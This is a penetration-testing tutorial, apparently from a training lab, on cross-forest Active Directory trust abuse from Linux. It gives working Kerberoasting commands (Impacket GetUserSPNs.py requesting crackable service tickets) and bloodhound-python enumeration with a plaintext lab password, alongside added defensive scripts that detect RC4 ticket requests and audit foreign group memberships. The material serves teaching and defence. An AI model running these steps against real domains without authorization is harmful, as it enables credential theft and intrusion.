🌳Cross-Forest Trust Abuse From Linux

Cross-Forest Kerberoasting

Just like with Windows, we are able to perform similar operations from a Linux attack host

Using GetUserSPNs.py

We need credentials for a user who can authenticate into the other domain, and we specify that domain with the -target-domain flag.

GetUserSPNs.py -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley

Impacket v0.9.25.dev1+20220311.121550.1271d369 - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName                 Name      MemberOf                                                PasswordLastSet             LastLogon  Delegation 
-----------------------------------  --------  ------------------------------------------------------  --------------------------  ---------  ----------
MSSQLsvc/sql01.freightlogstics:1433  mssqlsvc  CN=Domain Admins,CN=Users,DC=FREIGHTLOGISTICS,DC=LOCAL  2022-03-24 15:47:52.488917  <never> 

We can use the -request flag to request the TGS ticket, and the -outputfile flag to save it directly to a file, which we could then attempt to crack offline with Hashcat using mode 13100.

GetUserSPNs.py -request -outputfile tgs.hash -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley
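From the defender's side, the request above shows up on the target forest's DC as a Kerberos service ticket request (event 4769) for a user-account SPN, typically with the RC4 (0x17) encryption type, made by an account whose realm is not the DC's own domain. The script below is an added example, not part of this page or of Impacket, that runs that detection logic over a few constructed, flattened 4769 events; the DC host name, IP addresses and the account "bob" are invented for illustration.

```python
import re
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed sample 4769 events (Kerberos service ticket requested), flattened to
# key=value lines the way a SIEM export might look. Host name, IPs and the
# account "bob" are invented; the SPN account and domains match the page.
SAMPLE_EVENTS = [
    # Foreign-realm user requesting an RC4 ticket for a user-account SPN
    "EventID=4769 Computer=DC01.FREIGHTLOGISTICS.LOCAL TargetUserName=wley@INLANEFREIGHT.LOCAL "
    "TargetDomainName=INLANEFREIGHT.LOCAL ServiceName=mssqlsvc TicketEncryptionType=0x17 "
    "TicketOptions=0x40810000 IpAddress=::ffff:172.16.5.225 Status=0x0",
    # TGT-related traffic: krbtgt service, AES (0x12) ticket, ignored
    "EventID=4769 Computer=DC01.FREIGHTLOGISTICS.LOCAL TargetUserName=wley@INLANEFREIGHT.LOCAL "
    "TargetDomainName=INLANEFREIGHT.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 "
    "TicketOptions=0x40810000 IpAddress=::ffff:172.16.5.225 Status=0x0",
    # Same-domain user requesting an AES ticket for the SQL SPN: normal usage
    "EventID=4769 Computer=DC01.FREIGHTLOGISTICS.LOCAL TargetUserName=bob@FREIGHTLOGISTICS.LOCAL "
    "TargetDomainName=FREIGHTLOGISTICS.LOCAL ServiceName=mssqlsvc TicketEncryptionType=0x12 "
    "TicketOptions=0x40810000 IpAddress=::ffff:172.16.20.11 Status=0x0",
    # Machine-account SPN: excluded, computer accounts have long random passwords
    "EventID=4769 Computer=DC01.FREIGHTLOGISTICS.LOCAL TargetUserName=WS01$@FREIGHTLOGISTICS.LOCAL "
    "TargetDomainName=FREIGHTLOGISTICS.LOCAL ServiceName=DC01$ TicketEncryptionType=0x17 "
    "TicketOptions=0x40810000 IpAddress=::ffff:172.16.20.12 Status=0x0",
]

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """Turn one flattened key=value event line into a dict."""
    return dict(KV_RE.findall(line))


def dc_domain(computer_fqdn: str) -> str:
    """Domain of the DC that logged the event, taken from its FQDN."""
    return computer_fqdn.split(".", 1)[1].upper() if "." in computer_fqdn else ""


def is_roastable_request(ev: dict) -> bool:
    """Successful RC4 service ticket for a user-account SPN (not krbtgt, not a machine account)."""
    service = ev.get("ServiceName", "")
    return (
        ev.get("EventID") == "4769"
        and ev.get("Status") == "0x0"
        and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
        and service.lower() != "krbtgt"
        and not service.endswith("$")
    )


def find_kerberoast_candidates(lines) -> list:
    """Return one finding per requesting account, flagging cross-forest RC4 TGS requests."""
    per_requester = defaultdict(lambda: {"services": set(), "cross_forest": False, "sources": set()})
    for line in lines:
        ev = parse_event(line)
        if not is_roastable_request(ev):
            continue
        requester = ev["TargetUserName"]
        requester_realm = requester.rsplit("@", 1)[-1].upper()
        rec = per_requester[requester]
        rec["services"].add(ev["ServiceName"])
        rec["sources"].add(ev.get("IpAddress", ""))
        # Ticket issued by a DC in a different domain than the requester's account:
        # the cross-forest pattern this page describes.
        if requester_realm != dc_domain(ev.get("Computer", "")):
            rec["cross_forest"] = True
    return [
        {"requester": r, "services": sorted(v["services"]),
         "cross_forest": v["cross_forest"], "sources": sorted(v["sources"])}
        for r, v in sorted(per_requester.items())
    ]


if __name__ == "__main__":
    for finding in find_kerberoast_candidates(SAMPLE_EVENTS):
        print(finding)
```

Counting distinct ServiceName values per requester in a short window is the usual way to turn this into an alert; a single RC4 request can be legacy software, while many distinct SPNs from one account across a trust rarely is. Moving service accounts to AES-only (and long, rotated passwords, or gMSAs) removes the RC4 signal and the offline-cracking risk at the same time.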

Hunting Foreign Group Membership

From the last section, we saw that we may see users or admins from one domain as members of a group in another domain. On Linux we can gather this information using bloodhound-python to collect data from multiple domains.

Adding DOMAIN Information to /etc/resolv.conf

bloodhound-python may need the targeted DC's hostname rather than its IP address, which means our attack host must be able to resolve names in the target domain. We can edit /etc/resolv.conf as below to achieve this.

cat /etc/resolv.conf 

# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
#     DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
# 127.0.0.53 is the systemd-resolved stub resolver.
# run "resolvectl status" to see details about the actual nameservers.

#nameserver 1.1.1.1
#nameserver 8.8.8.8
domain INLANEFREIGHT.LOCAL
nameserver 172.16.5.5

Running bloodhound-python Against INLANEFREIGHT.LOCAL

bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2

INFO: Found AD domain: inlanefreight.local
INFO: Connecting to LDAP server: ACADEMY-EA-DC01
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 559 computers
INFO: Connecting to LDAP server: ACADEMY-EA-DC01
INFO: Found 2950 users
INFO: Connecting to GC LDAP server: ACADEMY-EA-DC02.LOGISTICS.INLANEFREIGHT.LOCAL
INFO: Found 183 groups
INFO: Found 2 trusts

<SNIP>

Compressing the File

zip -r ilfreight_bh.zip *.json

  adding: 20220329140127_computers.json (deflated 99%)
  adding: 20220329140127_domains.json (deflated 82%)
  adding: 20220329140127_groups.json (deflated 97%)
  adding: 20220329140127_users.json (deflated 98%)

Viewing Dangerous Rights in BloodHound

Once we upload our data, we can click on Users with Foreign Domain Group Membership under the Analysis tab and select the source domain as INLANEFREIGHT.LOCAL.
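The same "foreign domain group membership" check can be run straight over the collector's JSON output, which is useful when auditing a trust without a BloodHound GUI. The script below is an added example, not part of this page or of bloodhound-python; it assumes a simplified subset of the users.json and groups.json layout (a "data" list of objects with "ObjectIdentifier", "Properties" carrying "name" and "domain", and "Members" on groups). The SIDs, the user "jdoe" and the unresolved member SID are constructed for illustration and are not findings from the page's lab.

```python
import json
from typing import Dict, List

# Constructed sample data in the shape bloodhound-python writes to users.json and
# groups.json (only the fields this script needs). SIDs and "jdoe" are invented;
# the mssqlsvc account and Domain Admins group come from the page's output.
USERS_JSON = json.dumps({
    "data": [
        {"ObjectIdentifier": "S-1-5-21-1111-1111-1111-1105",
         "Properties": {"name": "JDOE@INLANEFREIGHT.LOCAL", "domain": "INLANEFREIGHT.LOCAL"}},
        {"ObjectIdentifier": "S-1-5-21-2222-2222-2222-1106",
         "Properties": {"name": "MSSQLSVC@FREIGHTLOGISTICS.LOCAL", "domain": "FREIGHTLOGISTICS.LOCAL"}},
    ],
    "meta": {"type": "users", "count": 2, "version": 4},
})
GROUPS_JSON = json.dumps({
    "data": [
        {"ObjectIdentifier": "S-1-5-21-2222-2222-2222-512",
         "Properties": {"name": "DOMAIN ADMINS@FREIGHTLOGISTICS.LOCAL", "domain": "FREIGHTLOGISTICS.LOCAL"},
         "Members": [
             {"ObjectIdentifier": "S-1-5-21-2222-2222-2222-1106", "ObjectType": "User"},
             {"ObjectIdentifier": "S-1-5-21-1111-1111-1111-1105", "ObjectType": "User"},
             # A member from a domain we never collected: only its SID is known
             {"ObjectIdentifier": "S-1-5-21-3333-3333-3333-1200", "ObjectType": "User"},
         ]},
        {"ObjectIdentifier": "S-1-5-21-1111-1111-1111-513",
         "Properties": {"name": "DOMAIN USERS@INLANEFREIGHT.LOCAL", "domain": "INLANEFREIGHT.LOCAL"},
         "Members": [{"ObjectIdentifier": "S-1-5-21-1111-1111-1111-1105", "ObjectType": "User"}]},
    ],
    "meta": {"type": "groups", "count": 2, "version": 4},
})


def domain_sid(sid: str) -> str:
    """Strip the RID so members can be compared by issuing domain even when unresolved."""
    return sid.rsplit("-", 1)[0]


def build_index(*json_blobs: str) -> Dict[str, dict]:
    """Map ObjectIdentifier -> {name, domain} across any number of collector files."""
    index: Dict[str, dict] = {}
    for blob in json_blobs:
        for obj in json.loads(blob)["data"]:
            props = obj.get("Properties", {})
            index[obj["ObjectIdentifier"]] = {
                "name": props.get("name", obj["ObjectIdentifier"]),
                "domain": props.get("domain", "").upper(),
            }
    return index


def foreign_memberships(users_json: str, groups_json: str) -> List[dict]:
    """List group members whose account domain differs from the group's own domain."""
    index = build_index(users_json, groups_json)
    findings = []
    for group in json.loads(groups_json)["data"]:
        gname = group["Properties"]["name"]
        gdomain = group["Properties"]["domain"].upper()
        gsid_prefix = domain_sid(group["ObjectIdentifier"])
        for member in group.get("Members", []):
            msid = member["ObjectIdentifier"]
            resolved = index.get(msid)
            if resolved:
                if resolved["domain"] == gdomain:
                    continue
                findings.append({"group": gname, "member": resolved["name"],
                                 "member_domain": resolved["domain"], "resolved": True})
            elif domain_sid(msid) != gsid_prefix:
                # Foreign SID that was not collected (a domain we did not enumerate):
                # still worth reporting, because BloodHound draws no edge for it.
                findings.append({"group": gname, "member": msid,
                                 "member_domain": "UNRESOLVED", "resolved": False})
    return findings


if __name__ == "__main__":
    for f in foreign_memberships(USERS_JSON, GROUPS_JSON):
        print(f)
```

To run it on real collector output, replace the two constants with open(...).read() of the users and groups files from the zip. The unresolved branch matters in practice: when only one side of a trust has been collected, foreign members appear as bare SIDs, and a report that silently skips them will miss exactly the cross-domain memberships this section is about.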
